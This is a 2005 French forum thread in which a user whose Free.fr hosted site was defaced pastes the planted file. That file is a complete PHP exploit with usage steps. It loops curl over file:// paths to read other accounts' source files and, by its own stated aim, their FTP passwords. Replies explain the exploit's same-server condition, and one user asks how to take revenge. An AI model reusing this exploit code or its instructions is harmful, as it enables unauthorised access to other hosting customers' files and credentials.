degrem_m

Faille Sites Free
« le: 26 décembre 2005 18:36:53 »
Salut,

J'ai un vieux site chez free, voir le premier que j'ai fait depuis que je fais des sites.

Et il y a une semaine, j'ai recut un mail me disant que mon site etait un fantome.

il n'y avait plus rien à part une page read.php contenant :

//     Global.Security.Hacking presents:
//
// ------- *.Free.Fr Read File Local Exploit -------
//
// by: [m0rtix, Dk30, Nobody, SymptOme, Darkprox, Corefus3d, En3rgi]
//

//    
// Apres la faille glob() classée Low, voici "DIMS"
// qui permet de lire la source de n'importe quel fichier
// se trouvant sur un xxx.free.fr. et donc pour un intru
// de saisir tous les mots-de-passes FTP des comptes Free.fr
//
//
// Utilisation:
//
// 1) Mettre un script sur un compte free.fr
// 2) Pinguer le compte xxx.free.Fr à attaquer
// 3) Si l'IP du compte free à attaquer est la même que
//    celui de l'attaquant, l'attaque peut continuer.
//    Dans le cas contraire, mettre le script sur un
//    autre compte .free.fr ayant cette IP.
// 4) Utiliser la syntase suivante:
//         http://attaquant.free.Fr/script.php?lala=/attaqué/fichier.php
//
// Exemple: http://gsh.free.fr/read.php?lala=/compte/index.php
//
// /! le compte à attaquer ne doit pas contenir de .free.fr dans la syntase http
// Ici c'est compte.free.fr qui sera attaqué (Ne pas mettre .free.Fr).
//
// Résultat: On aura la source de http://compte.free.fr/index.php
// :]
//
// Copyright 2005 - Tous droits réservés - GSH TeAM
// Irc.netmisphere.com #gsh
// [email protected]

// Le script:

$zone = array(
"a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9",
);

$lala = $_REQUEST['lala'];
foreach($zone as $first) {
foreach($zone as $second) {
$url = "file:///var/www/free.fr/$first/$second/$lala";
$ch = curl_init($url);
$b=curl_exec($ch);
if($b=='%<%') {
echo "$url
";<br />curl_exec($ch);<br />curl_close($ch);<br />echo ""; }
        }
}

// TeAM GSH - 2005 - Copyright
?>



Est ce dèja arrivé a quelqu'un ?

L. Antoine

Faille Sites Free
« Réponse #1 le: 26 décembre 2005 18:53:19 »
Cette faille est censée être corrigée mais je peux me tromper. Il y a une discussion sur les newsgroups de la faille glob qui a dérivé (dans mes souvenirs) sur celle de cURL.

Savez-vous depuis quand ce compte est dans cet état là ?

snake007

Faille Sites Free
« Réponse #2 le: 27 décembre 2005 11:42:05 »
je n'ai rien compris mais je croit que moi aussi il m'est arrivé la meme chose.
et je croit savoir qui m'a fait sa, si quelqu'un pouvait me donner le moyen de me venger sa serai cool!
merci

piwi

Faille Sites Free
« Réponse #3 le: 27 décembre 2005 11:51:05 »
Citer
// 3) Si l'IP du compte free à attaquer est la même que
//    celui de l'attaquant, l'attaque peut continuer.
j'ai du mal a saisir ce point...


0y0y

Faille Sites Free
« Réponse #4 le: 27 décembre 2005 12:11:35 »
Citation de: piwi
Citer
// 3) Si l'IP du compte free à attaquer est la même que
//    celui de l'attaquant, l'attaque peut continuer.
j'ai du mal a saisir ce point...
Ben, il faut que le compte des pages perso de la victime et celui de l'attaquant soient sur le même serveur.

freemat

Faille Sites Free
« Réponse #5 le: 02 janvier 2006 01:46:50 »
Citation de: degrem_m
$url = "file:///var/www/free.fr/$first/$second/$lala";
$ch = curl_init($url);
$b=curl_exec($ch);
if($b=='%<%') {
echo "$url
";<br />curl_exec($ch);<br />curl_close($ch);<br />echo ""; }
Elle est en principe patchée depuis un moment cette faille.